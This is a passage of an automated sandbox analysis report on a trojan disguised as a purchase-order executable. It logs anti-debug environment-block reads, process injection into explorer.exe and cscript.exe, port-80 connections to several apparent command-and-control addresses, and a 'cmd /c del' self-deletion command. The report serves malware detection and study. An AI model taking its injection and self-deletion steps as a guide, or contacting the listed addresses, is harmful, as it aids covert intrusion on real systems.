          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B05A7 mov eax, dword ptr fs:[00000030h]2_2_017B05A7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E59C mov eax, dword ptr fs:[00000030h]2_2_0176E59C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01732582 mov eax, dword ptr fs:[00000030h]2_2_01732582
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01732582 mov ecx, dword ptr fs:[00000030h]2_2_01732582
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01764588 mov eax, dword ptr fs:[00000030h]2_2_01764588
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175A470 mov eax, dword ptr fs:[00000030h]2_2_0175A470
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175A470 mov eax, dword ptr fs:[00000030h]2_2_0175A470
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175A470 mov eax, dword ptr fs:[00000030h]2_2_0175A470
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BC460 mov ecx, dword ptr fs:[00000030h]2_2_017BC460
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EA456 mov eax, dword ptr fs:[00000030h]2_2_017EA456
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172645D mov eax, dword ptr fs:[00000030h]2_2_0172645D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175245A mov eax, dword ptr fs:[00000030h]2_2_0175245A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E443 mov eax, dword ptr fs:[00000030h]2_2_0176E443
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E443 mov eax, dword ptr fs:[00000030h]2_2_0176E443
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E443 mov eax, dword ptr fs:[00000030h]2_2_0176E443
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E443 mov eax, dword ptr fs:[00000030h]2_2_0176E443
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E443 mov eax, dword ptr fs:[00000030h]2_2_0176E443
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E443 mov eax, dword ptr fs:[00000030h]2_2_0176E443
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E443 mov eax, dword ptr fs:[00000030h]2_2_0176E443
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E443 mov eax, dword ptr fs:[00000030h]2_2_0176E443
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172E420 mov eax, dword ptr fs:[00000030h]2_2_0172E420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172E420 mov eax, dword ptr fs:[00000030h]2_2_0172E420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172E420 mov eax, dword ptr fs:[00000030h]2_2_0172E420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172C427 mov eax, dword ptr fs:[00000030h]2_2_0172C427
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B6420 mov eax, dword ptr fs:[00000030h]2_2_017B6420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B6420 mov eax, dword ptr fs:[00000030h]2_2_017B6420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B6420 mov eax, dword ptr fs:[00000030h]2_2_017B6420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B6420 mov eax, dword ptr fs:[00000030h]2_2_017B6420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B6420 mov eax, dword ptr fs:[00000030h]2_2_017B6420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B6420 mov eax, dword ptr fs:[00000030h]2_2_017B6420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B6420 mov eax, dword ptr fs:[00000030h]2_2_017B6420
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01768402 mov eax, dword ptr fs:[00000030h]2_2_01768402
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01768402 mov eax, dword ptr fs:[00000030h]2_2_01768402
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01768402 mov eax, dword ptr fs:[00000030h]2_2_01768402
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017304E5 mov ecx, dword ptr fs:[00000030h]2_2_017304E5
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017644B0 mov ecx, dword ptr fs:[00000030h]2_2_017644B0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BA4B0 mov eax, dword ptr fs:[00000030h]2_2_017BA4B0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017364AB mov eax, dword ptr fs:[00000030h]2_2_017364AB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EA49A mov eax, dword ptr fs:[00000030h]2_2_017EA49A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01738770 mov eax, dword ptr fs:[00000030h]2_2_01738770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740770 mov eax, dword ptr fs:[00000030h]2_2_01740770
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01730750 mov eax, dword ptr fs:[00000030h]2_2_01730750
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BE75D mov eax, dword ptr fs:[00000030h]2_2_017BE75D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772750 mov eax, dword ptr fs:[00000030h]2_2_01772750
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772750 mov eax, dword ptr fs:[00000030h]2_2_01772750
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B4755 mov eax, dword ptr fs:[00000030h]2_2_017B4755
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176674D mov esi, dword ptr fs:[00000030h]2_2_0176674D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176674D mov eax, dword ptr fs:[00000030h]2_2_0176674D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176674D mov eax, dword ptr fs:[00000030h]2_2_0176674D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176273C mov eax, dword ptr fs:[00000030h]2_2_0176273C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176273C mov ecx, dword ptr fs:[00000030h]2_2_0176273C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176273C mov eax, dword ptr fs:[00000030h]2_2_0176273C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AC730 mov eax, dword ptr fs:[00000030h]2_2_017AC730
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176C720 mov eax, dword ptr fs:[00000030h]2_2_0176C720
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176C720 mov eax, dword ptr fs:[00000030h]2_2_0176C720
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01730710 mov eax, dword ptr fs:[00000030h]2_2_01730710
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01760710 mov eax, dword ptr fs:[00000030h]2_2_01760710
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176C700 mov eax, dword ptr fs:[00000030h]2_2_0176C700
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017347FB mov eax, dword ptr fs:[00000030h]2_2_017347FB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017347FB mov eax, dword ptr fs:[00000030h]2_2_017347FB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017527ED mov eax, dword ptr fs:[00000030h]2_2_017527ED
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017527ED mov eax, dword ptr fs:[00000030h]2_2_017527ED
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017527ED mov eax, dword ptr fs:[00000030h]2_2_017527ED
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BE7E1 mov eax, dword ptr fs:[00000030h]2_2_017BE7E1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173C7C0 mov eax, dword ptr fs:[00000030h]2_2_0173C7C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B07C3 mov eax, dword ptr fs:[00000030h]2_2_017B07C3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017307AF mov eax, dword ptr fs:[00000030h]2_2_017307AF
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E47A0 mov eax, dword ptr fs:[00000030h]2_2_017E47A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D678E mov eax, dword ptr fs:[00000030h]2_2_017D678E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01762674 mov eax, dword ptr fs:[00000030h]2_2_01762674
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F866E mov eax, dword ptr fs:[00000030h]2_2_017F866E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F866E mov eax, dword ptr fs:[00000030h]2_2_017F866E
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0070647E GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0070DCAA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Network Connect: 13.248.169.48 80
          Source: C:\Windows\explorer.exe Network Connect: 102.134.40.151 80
          Source: C:\Windows\explorer.exe Network Connect: 45.76.63.192 80
          Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe Network Connect: 172.67.165.166 80
          Source: C:\Windows\explorer.exe Network Connect: 66.147.240.91 80
          Source: C:\Windows\explorer.exe Network Connect: 66.235.200.146 80
          Source: C:\Windows\explorer.exe Network Connect: 198.185.159.144 80
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Memory written: C:\Users\user\Desktop\Purchase Order#23113.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Section loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\cscript.exe Thread register set: target process: 2580
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 700000
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Process created: C:\Users\user\Desktop\Purchase Order#23113.exe "C:\Users\user\Desktop\Purchase Order#23113.exe"
          Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Purchase Order#23113.exe"
          Source: explorer.exe, 00000003.00000002.4205364181.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4200505291.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.4200505291.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1773323446.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.4199885899.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1773041835.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
          Source: explorer.exe, 00000003.00000002.4200505291.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1773323446.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.4200505291.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1773323446.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
          Source: C:\Windows\SysWOW64\cscript.exe Code function: GetUserDefaultLCID,FreeLibrary,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA, 4_2_0070AADC
          Source: C:\Windows\SysWOW64\cscript.exe Code function: GetLocaleInfoW,wcsncmp, 4_2_00717E85
          Source: C:\Windows\SysWOW64\cscript.exe Code function: GetLocaleInfoW, 4_2_0070AB35
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Queries volume information: C:\Users\user\Desktop\Purchase Order#23113.exe VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
